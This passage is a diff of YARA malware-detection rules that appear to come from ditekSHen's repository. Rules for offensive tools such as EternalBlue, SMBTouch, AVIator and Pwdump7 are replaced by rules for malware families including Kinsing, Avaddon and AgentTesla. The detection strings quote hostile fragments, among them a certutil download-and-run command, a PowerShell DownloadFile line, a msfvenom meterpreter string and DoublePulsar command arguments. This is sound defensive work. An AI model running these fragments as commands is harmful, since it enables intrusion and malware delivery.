+		$s13 = "User-Agent: Mozilla/5.00 (compatible; MSIE 6.0; Win32)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $* ) or 3 of ( $f* ) or all of ( $dll_* ) or any of ( $sys_* ) )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCN_Portscan : FILE
+rule DITEKSHEN_MALWARE_Win_Rhttpctrl : FILE
 {
 	meta:
-		description = "Detects a port scanner tool observed as second or third stage post-compromise or dropped by malware."
+		description = "RHttpCtrl backdoor payload"
 		author = "ditekSHen"
-		id = "f270e098-17a0-5d66-acd0-c946a29919f4"
+		id = "fa80db13-90af-5d6a-bcc2-ad1f6808268e"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L166-L180"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1249-L1265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ebe5eb045a250ca38a55ac43018548074e9db160d76737c36f8ae5ea268b7b10"
+		logic_hash = "a8b27fcc4636c2fe02a0e006295ece7f705cc9a042921f66ef1f9b6a88aaf9a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "HEAD / HTTP/1.0" fullword ascii
-		$s2 = "Result.txt" fullword ascii
-		$s3 = "Example: %s SYN " ascii
-		$s4 = "Performing Time: %d/%d/%d %d:%d:%d -->" fullword ascii
-		$s5 = "Bind On IP: %d.%d.%d.%d" fullword ascii
-		$s6 = "SYN Scan: About To Scan %" ascii
-		$s7 = "Normal Scan: About To Scan %" ascii
+		$s1 = "%d_%04d%02d%02d%02d%02d%02d." ascii
+		$s2 = "ver=%s&id=%06d&type=" ascii
+		$s3 = "ver=%d&id=%s&random=%d&" ascii
+		$s4 = "id=%d&output=%s" ascii
+		$s5 = "Error:WinHttpCrackUrl failed!/n" ascii
+		$s6 = "Error:SendRequest failed!/n" ascii
+		$s7 = ".exe a %s %s" ascii
+		$s8 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" fullword wide
+		$pdb = "\\WorkSources\\RHttpCtrl\\Server\\Release\\svchost.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_MEM_Mxtract : FILE
+rule DITEKSHEN_MALWARE_Win_Pillowmint : FILE
 {
 	meta:
-		description = "Detects mXtract, a linux-based tool that dumps memory for offensive pentration testing and can be used to scan memory for private keys, ips, and passwords using regexes."
+		description = "PillowMint POS payload"
 		author = "ditekSHen"
-		id = "e8c5e5b3-aa98-5f7f-9410-3efeef725f41"
+		id = "e3d26a12-45aa-5f5d-997a-f350bc1bea97"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L182-L195"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1267-L1283"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8271722c3b8f4458d20cf874d37e87e3b1fde701205ff54f0360fb87f717fc3f"
-		score = 50
-		quality = 69
+		logic_hash = "ed2597fce1c56d2e110790e0eb89834b1bb9f6f52d39105157c9ffe2ede6cc7a"
+		score = 75
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "_ZN18process_operations10get_rangesEv" fullword ascii
-		$s2 = "_ZN4misc10write_dumpESsSs" fullword ascii
-		$s3 = "_ZTVNSt8__detail13_Scanner_baseE" fullword ascii
-		$s4 = "Running as root is recommended as not all PIDs will be scanned" fullword ascii
-		$s5 = "ERROR ATTACHING TO PROCESS" fullword ascii
-		$s6 = "ERROR SCANNING MEMORY RANGE" fullword ascii
+		$s1 = "system32\\sysvols\\" ascii nocase
+		$s2 = "Sysnative\\sysvols\\" ascii nocase
+		$s3 = "critical.log" fullword ascii
+		$s4 = "log.log" fullword ascii
+		$s5 = "commands.txt" fullword ascii
+		$s6 = "_EV0LuTi0N_" ascii
+		$s7 = /(file|reg)\scmd:/ fullword ascii
+		$s8 = "dumper_nologs_" ascii
+		$s9 = "ReflectiveLoader" ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f or uint16( 0 ) == 0x457f ) and 3 of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Sniffpass : FILE
+rule DITEKSHEN_MALWARE_Win_Blackshadesrat : FILE
 {
 	meta:
-		description = "Detects SniffPass, a password monitoring software that listens on the network and captures passwords over POP3, IMAP4, SMTP, FTP, and HTTP."
+		description = "BlackshadesRAT / Cambot POS payload"
 		author = "ditekSHen"
-		id = "b96498d4-bbe3-5cb8-9c24-91ebb51e078a"
+		id = "bd0ad920-109a-50b5-94af-6580684bff52"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L197-L212"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1285-L1300"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b56ee4bac39b4220b24e92d00076650ffe84b71a60c0213a84fcf21c6cfe4cf"
+		logic_hash = "5c2a76ce52bce9c37a3518ff459011acb733c2c5abac74786e41a1c169459ce2"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		snort_sid = "920208-920210"
 
 	strings:
-		$s1 = "\\Release\\SniffPass.pdb" ascii
-		$s2 = "Password   Sniffer" fullword wide
-		$s3 = "Software\\NirSoft\\SniffPass" fullword ascii
-		$s4 = "Sniffed PasswordsCFailed to start" wide
-		$s5 = "Pwpcap.dll" fullword ascii
-		$s6 = "nmwifi.exe" fullword ascii
-		$s7 = "NmApi.dll" fullword ascii
-		$s8 = "npptools.dll" fullword ascii
+		$s1 = "bhookpl.dll" fullword wide
+		$s2 = "drvloadn.dll" fullword wide
+		$s3 = "drvloadx.dll" fullword wide
+		$s4 = "SPY_NET_RATMUTEX" fullword wide
+		$s5 = "\\dump.txt" fullword wide
+		$s6 = "AUTHLOADERDEFAULT" fullword wide
+		$pdb = "*\\AC:\\Users\\Admin\\Desktop_old\\Blackshades project\\bs_bot\\bots\\bot\\bs_bot.vbp" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Avbypass_Aviator : FILE
+rule DITEKSHEN_MALWARE_Win_Goldenspy : FILE
 {
 	meta:
-		description = "Detects AVIator, which is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. This was observed to bypass Win.Trojan.AZorult. This rule works for binaries and memory."
-		author = "ditekSHen"
-		id = "2bddd64e-baca-58cb-ba52-27487cc4ded5"
+		description = "GoldenSpy dropper payload"
+		author = "SpiderLabs Trustwave"
+		id = "01d3f14a-fefb-5cea-b055-d7e9f4c7d13b"
 		date = "2020-11-06"
-		modified = "2024-09-25"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L214-L240"
+		modified = "2024-11-01"
+		reference = "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1302-L1314"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1fb497eec2b0cd4051b5ddd53463f1da511c0a7b72d54a0bc68736a99fdc6143"
+		logic_hash = "908047db2167733da0089375dbfd636881e721cc219da110755b81581d438cfa"
 		score = 75
-		quality = 50
+		quality = 67
 		tags = "FILE"
 
 	strings:
-		$s1 = "msfvenom -p windows/meterpreter" ascii wide
-		$s2 = "payloadBox.Text" ascii wide
-		$s3 = "APCInjectionCheckBox" ascii wide
-		$s4 = "Thread Hijacking (Shellcode Arch: x86, OS Arch: x86)" ascii wide
-		$s5 = "injectExistingApp.Text" ascii wide
-		$s6 = "Stable execution but can be traced by most AVs" ascii wide
-		$s7 = "AV/\\tor" ascii wide
-		$s8 = "AvIator.Properties.Resources" ascii wide
-		$s9 = "Select injection technique" ascii wide
-		$s10 = "threadHijacking_option" ascii wide
-		$pwsh1 = "Convert.ToByte(Payload_Encrypted_Without_delimiterChar[" ascii wide
-		$pwsh2 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" ascii wide
-		$pwsh3 = "IntPtr RtlAdjustPrivilege(" ascii wide
-		$pwsh4 = /InjectShellcode\.(THREADENTRY32|CONTEXT64|WriteProcessMemory\(|CloseHandle\(|CONTEXT_FLAGS|CONTEXT\(\);|Thread32Next\()/ ascii wide
-		$pwsh5 = "= Payload_Encrypted.Split(',');" ascii wide
-		$pwsh6 = "namespace NativePayload_Reverse_tcp" ascii wide
-		$pwsh7 = "byte[] Finall_Payload = Decrypt(KEY, _X_to_Bytes);" ascii wide
-		$pwsh8 = /ConstantsAndExtCalls\.(WriteProcessMemory\(|CreateRemoteThread\()/ ascii wide
+		$reg = "Software\\IDG\\DA" nocase wide ascii
+		$str1 = "requestStr" nocase wide ascii
+		$str2 = "nb_app_log_mutex" nocase wide ascii
+		$str3 = { 510F4345[0-10]50518D8DCCFE[0-20]837D1C[0-20]8D45[0-15]0F4345[0-20]505157 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $pwsh* ) ) ) or ( 3 of ( $s* ) or 2 of ( $pwsh* ) )
+		( uint16( 0 ) == 0x5A4D ) and $reg and 2 of ( $str* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Pwdump7 : FILE
+rule DITEKSHEN_MALWARE_Win_Plurox : FILE
 {
 	meta:
-		description = "Detects Pwdump7 password Dumper"
+		description = "Plurox backdoor payload"
 		author = "ditekSHen"
-		id = "dc6ff544-b9de-547b-9fa8-7d0b32e9592d"
+		id = "c8a97132-c1d5-5456-a055-d46a9399dbdd"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L242-L254"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1316-L1328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f84ab69ecc6837a826dc8726785165b8135edf51a47fb5bbaf19dc589b3032bd"
+		logic_hash = "c2ec2ce7a9210d8eebb06c755eab51cab93fe6d48d737fd1756ffe42d46b35d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "savedump.dat" fullword ascii
-		$s2 = "Asd -_- _RegEnumKey fail!" fullword ascii
-		$s3 = "\\SAM\\" ascii
-		$s4 = "Unable to dump file %S" fullword ascii
-		$s5 = "NO PASSWORD" ascii
+		$s1 = "autorun.c" fullword ascii
+		$s2 = "launcher.c" fullword ascii
+		$s3 = "loader.c" fullword ascii
+		$s4 = "stealth.c" fullword ascii
+		$s5 = "RunFromMemory" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Sharpexec : FILE
+rule DITEKSHEN_MALWARE_Win_Avalon : FILE
 {
 	meta:
-		description = "Detects SharpExec lateral movement tool"
+		description = "Avalon infostealer payload"
 		author = "ditekSHen"
-		id = "4373a052-9525-5b24-81a4-65cd68afcb6c"
+		id = "3de01419-9f45-5d82-8391-2e1e41df2b34"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L256-L275"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1330-L1359"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "17ae5c9f0b22e8ecbbbcbe052e466d00cb7b62cff423688b5138209c52f0698d"
+		logic_hash = "1aa9dc09ec4c8962dee0455dd367e32139e4c03f1b306f17ac6e82d71aacf713"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "fileUploaded" fullword ascii
-		$s2 = "$7fbad126-e21c-4c4e-a9f0-613fcf585a71" fullword ascii
-		$s3 = "DESKTOP_HOOKCONTROL" fullword ascii
-		$s4 = /WINSTA_(ACCESSCLIPBOARD|WINSTA_ALL_ACCESS)/ fullword ascii
-		$s5 = /NETBIND(ADD|DISABLE|ENABLE|REMOVE)/ fullword ascii
-		$s6 = /SERVICE_(ALL_ACCESS|WIN32_OWN_PROCESS|INTERROGATE)/ fullword ascii
-		$s7 = /(Sharp|PS|smb)Exec/ fullword ascii
-		$s8 = "lpszPassword" fullword ascii
-		$s9 = "lpszDomain" fullword ascii
-		$s10 = "wmiexec" fullword ascii
-		$s11 = "\\C$\\__LegitFile" wide
-		$s12 = "LOGON32_LOGON_NEW_CREDENTIALS" fullword ascii
+		$s1 = "Parsecards" fullword ascii
+		$s2 = "Please_Gofuckyouself" fullword ascii
+		$s3 = "GetDomainDetect" fullword ascii
+		$s4 = "GetTotalCommander" fullword ascii
+		$s5 = "KnownFolder" fullword ascii
+		$s6 = "set_hidden" fullword ascii
+		$s7 = "set_system" fullword ascii
+		$l1 = "\\DomainDetect.txt" wide
+		$l2 = "\\Grabber_Log.txt" wide
+		$l3 = "\\Programs.txt" wide
+		$l4 = "\\Passwords_Edge.txt" wide
+		$l5 = "\\KL.txt" wide
+		$w1 = "dont touch" fullword wide
+		$w2 = "Grabber" fullword wide
+		$w3 = "Keylogger" fullword wide
+		$w4 = "password-check" fullword wide
+		$w5 = "H4sIAAAAAAAEA" wide
+		$p1 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
+		$p2 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 9 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PRV_Advancedrun : FILE
+rule DITEKSHEN_MALWARE_Linux_Kinsing : FILE
 {
 	meta:
-		description = "Detects NirSoft AdvancedRun privialge escalation tool"
+		description = "Kinsing RAT payload"
 		author = "ditekSHen"
-		id = "c886951a-7ee9-5d38-a724-3dbba8c6ec31"
+		id = "b13d2c36-c8d3-5138-9e9a-8b5390a93c8d"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L277-L289"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1361-L1376"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3f39e8f0629647f44a2f473d7b49a8b6adb1acd62de36420b80e7820e63854bb"
+		logic_hash = "566eb7d1864e3a8088ad4f5d032d6d62a33080bbfc5c20c2520315cfc8146afc"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "RunAsProcessName" fullword wide
-		$s2 = "Process ID/Name:" fullword wide
-		$s3 = "swinsta.dll" fullword wide
-		$s4 = "User of the selected process0Child of selected process (Using code injection) Specified user name and password" fullword wide
-		$s5 = "\"Current User - Allow UAC Elevation$Current User - Without UAC Elevation#Administrator (Force UAC Elevation)" fullword wide
+		$s1 = "backconnect" ascii
+		$s2 = "connectForSocks" ascii
+		$s3 = "downloadAndExecute" ascii
+		$s4 = "download_and_exec" ascii
+		$s5 = "masscan" ascii
+		$s6 = "UpdateCommand:" ascii
+		$s7 = "exec_out" ascii
+		$s8 = "doTask with type %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x457f and 6 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Amady : FILE
+rule DITEKSHEN_MALWARE_Win_Avaddon : FILE
 {
 	meta:
-		description = "Detects password stealer DLL. Dropped by Amadey"
+		description = "Avaddon ransomware payload"
 		author = "ditekSHen"
-		id = "6ee4e25b-bf38-5664-a08f-94e3fa92aa29"
+		id = "d5618c8a-17b7-5009-9947-a6462ad2a4af"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L291-L306"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1378-L1395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "409374bec5f58abeb7741b41f0fc7ea1c3fdc7bbc3f0c0628db0e3aac82836d1"
+		logic_hash = "fc3032572d2ab2550d3dde738a3d403459da9b5b640acc814596d958b83620bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\AppData" fullword ascii
-		$s2 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook" ascii
-		$s3 = "\\Mikrotik\\Winbox\\Addresses.cdb" fullword ascii
-		$s4 = "\\HostName" fullword ascii
-		$s5 = "\\Password" fullword ascii
-		$s6 = "SOFTWARE\\RealVNC\\" ascii
-		$s7 = "SOFTWARE\\TightVNC\\" ascii
-		$s8 = "cred.dll" fullword ascii
+		$s1 = "\\IMAGEM~1.%d\\VISUA~1\\BIN\\%s.exe" ascii
+		$s2 = "\\IMAGEM~1.%.2d-\\VISUA~1\\BIN\\%s.exe" ascii
+		$s3 = "\\IMAGEM~1.%d-Q\\VISUA~1\\BIN\\%s.exe" ascii
+		$s4 = "\\IMAGEM~1.%d\\%s.exe" ascii
+		$s5 = "EW6]>mFXDS?YBi?W5] CY 4Z8Y BY7Y BZ8Z CY7Y AY8Z CZ8Y!Y:Z" ascii
+		$s6 = "FY  AY 'Z      ;W      @Y  @Y 'Z    Y  @Y (Z" ascii
+		$s7 = "\"rcid\":\"" fullword ascii
+		$s8 = "\"ip\":\"" fullword ascii wide
+		$s9 = ".?AUANEventIsGetExternalIP@@" fullword ascii
+		$s10 = ".?AUANEventGetCpuMax@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 7 of them
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCR_Amady : FILE
+rule DITEKSHEN_MALWARE_Win_Prolock : FILE
 {
 	meta:
-		description = "Detects screenshot stealer DLL. Dropped by Amadey"
+		description = "ProLock ransomware payload"
 		author = "ditekSHen"
-		id = "f7660899-ed12-5765-a856-6a1c7bbd8978"
+		id = "88fa19ba-238c-5d4d-bf0c-d421ee2ecf1d"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L308-L320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1397-L1413"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9e7ab39976e3219f0c6c3ce5341442343cc4baf30757cd1c9d0c2d3845fdda2f"
+		logic_hash = "b7d2cc71acc4f643a86781d957afcf5203a2f4034b9ca7da93e8227ddee79f3b"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.ProLock"
 
 	strings:
-		$s1 = "User-Agent: Uploador" fullword ascii
-		$s2 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
-		$s3 = "WebUpload" fullword ascii
-		$s4 = "Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String" wide
-		$s5 = "scr.dll" fullword ascii
+		$s1 = ".flat" fullword ascii
+		$s2 = ".data" fullword ascii
+		$s3 = ".api" fullword ascii
+		$s4 = "RtlZeroMemory" fullword ascii
+		$s5 = "LoadLibraryA" fullword ascii
+		$s6 = "Sleep" fullword ascii
+		$s7 = "lstrcatA" fullword ascii
+		$s8 = { 55 89 E5 8B 45 08 EB 00 89 45 EC 8D 15 4F 10 40 00 8D 05 08 10 40 00 83 E8 08 29 C2 8B 45 EC 01 C2 31 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Eternalblue : FILE
+rule DITEKSHEN_MALWARE_Win_Purplewave : FILE
 {
 	meta:
-		description = "Detects Windows executables containing EternalBlue explitation artifacts"
+		description = "PurpleWave infostealer payload"
 		author = "ditekSHen"
-		id = "08173a1e-2e32-5add-864a-d92ffa0a3e44"
+		id = "6f978190-4b4d-5346-9218-0c9104254b45"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L322-L342"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1415-L1432"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "63e56637118accb8c32c20e52465c027df2dbf83b3b663d316b453ce879572c8"
+		logic_hash = "98dca005d2fdf7eea89661e162292451b544847a7f8b63c8c25c82241ec8e04a"
 		score = 75
-		quality = 50
+		quality = 25
 		tags = "FILE"
 
 	strings:
-		$ci1 = "CNEFileIO_" ascii wide
-		$ci2 = "coli_" ascii wide
-		$ci3 = "mainWrapper" ascii wide
-		$dp1 = "EXPLOIT_SHELLCODE" ascii wide
-		$dp2 = "ETERNALBLUE_VALIDATE_BACKDOOR" ascii wide
-		$dp3 = "ETERNALBLUE_DOUBLEPULSAR_PRESENT" ascii wide
-		$dp4 = "//service[name='smb']/port" ascii wide
-		$dp5 = /DOUBLEPULSAR_(PROTOCOL_|ARCHITECTURE_|FUNCTION_|DLL_|PROCESS_|COMMAND_|IS_64_BIT)/
-		$cm1 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll" ascii wide
-		$cm2 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll" ascii wide
-		$cm3 = "--DaveProxyPort=0 --NetworkTimeout 30 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig" ascii wide
+		$s1 = "/loader/" fullword ascii
+		$s2 = "\\load_" fullword wide
+		$s3 = "boundaryaswell" fullword ascii
+		$s4 = "[passwords]" ascii
+		$s5 = "[is_encrypted]" ascii
+		$s6 = "[cookies]" ascii
+		$s7 = ".?AVMozillaBrowser@@" fullword ascii
+		$s8 = ".?AVChromeBrowser@@" fullword ascii
+		$s9 = ".?AV?$money" ascii
+		$s10 = "at t.me/LuckyStoreSupport" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $ci* ) ) or ( 2 of ( $dp* ) ) or ( 1 of ( $dp* ) and 1 of ( $ci* ) ) or ( 1 of ( $cm* ) )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Weblogic : FILE
+rule DITEKSHEN_MALWARE_Java_Pyrogenic
 {
 	meta:
-		description = "Detects Windows executables containing Weblogic exploits commands"
+		description = "Pyrogenic/Qealler infostealer payload"
 		author = "ditekSHen"
-		id = "e761a968-35cb-5284-99f2-6d516ad348e3"
+		id = "2b9268f0-2f73-51ad-ab72-9289e42e5bb1"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L344-L353"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1434-L1446"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "01855f1125b0ba87dd40f7d460440dbda2d75c8b484e842a2b2e20c089b4ab5e"
+		logic_hash = "bb8cb939f06a376f72dcbbb1f04ec34526f72c3bcc3b146b905a8466826d2c24"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "certutil.exe -urlcache -split -f AAAAA BBBBB & cmd.exe /c BBBBB" ascii
-		$s2 = "powershell (new-object System.Net.WebClient).DownloadFile('AAAAA','BBBBB')" ascii
+		$s1 = "bbb6fec5ebef0d93" ascii wide
+		$s2 = "2a898bc98aaf6c96f2054bb1eadc9848eb77633039e9e9ffd833184ce553fe9b" ascii wide
+		$s3 = "addShutdownHook" ascii wide
+		$s4 = "obfuscated/META-INF/QeallerV" ascii wide
+		$s5 = "globalIpAddress" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCN_Smbtouch : FILE
+rule DITEKSHEN_MALWARE_Win_Agentteslav3 : FILE
 {
 	meta:
-		description = "Detects SMBTouch scanner EternalBlue, EternalChampion, EternalRomance, EternalSynergy"
+		description = "AgentTeslaV3 infostealer payload"
 		author = "ditekSHen"
-		id = "4e8176dd-4113-5fa8-a695-77e7169f6975"
+		id = "c44c69dd-5e95-595c-88c7-89e243648198"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L376-L400"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1448-L1481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "78c2a435762d3febe927eb15910d5a18c1ffe74604673463543d3c859f5ef8e9"
+		logic_hash = "6c62b2f601eba3c83b60f7f6dbd3d0ec3c01af30f4312df897bb5e902c36fdac"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "[+] SMB Touch started" fullword ascii
-		$s2 = "[-] Could not connect to share (0x%08X - %s)" fullword ascii
-		$s3 = "[!] Target could be either SP%d or SP%d," fullword ascii
-		$s4 = "[!] for these SMB exploits they are equivalent" fullword ascii
-		$s5 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
-		$s6 = "[+] Touch completed successfully" fullword ascii
-		$s7 = "Network error while determining exploitability" fullword ascii
-		$s8 = "Named pipe or share required for exploit" fullword ascii
-		$w1 = "UsingNbt" fullword ascii
-		$w2 = "TargetPort" fullword ascii
-		$w3 = "TargetIp" fullword ascii
-		$w4 = "RedirectedTargetPort" fullword ascii
-		$w5 = "RedirectedTargetIp" fullword ascii
-		$w6 = "NtlmHash" fullword ascii
-		$w7 = "\\PIPE\\LANMAN" fullword ascii
-		$w8 = "UserRejected: " fullword ascii
+		$s1 = "get_kbok" fullword ascii
+		$s2 = "get_CHoo" fullword ascii
+		$s3 = "set_passwordIsSet" fullword ascii
+		$s4 = "get_enableLog" fullword ascii
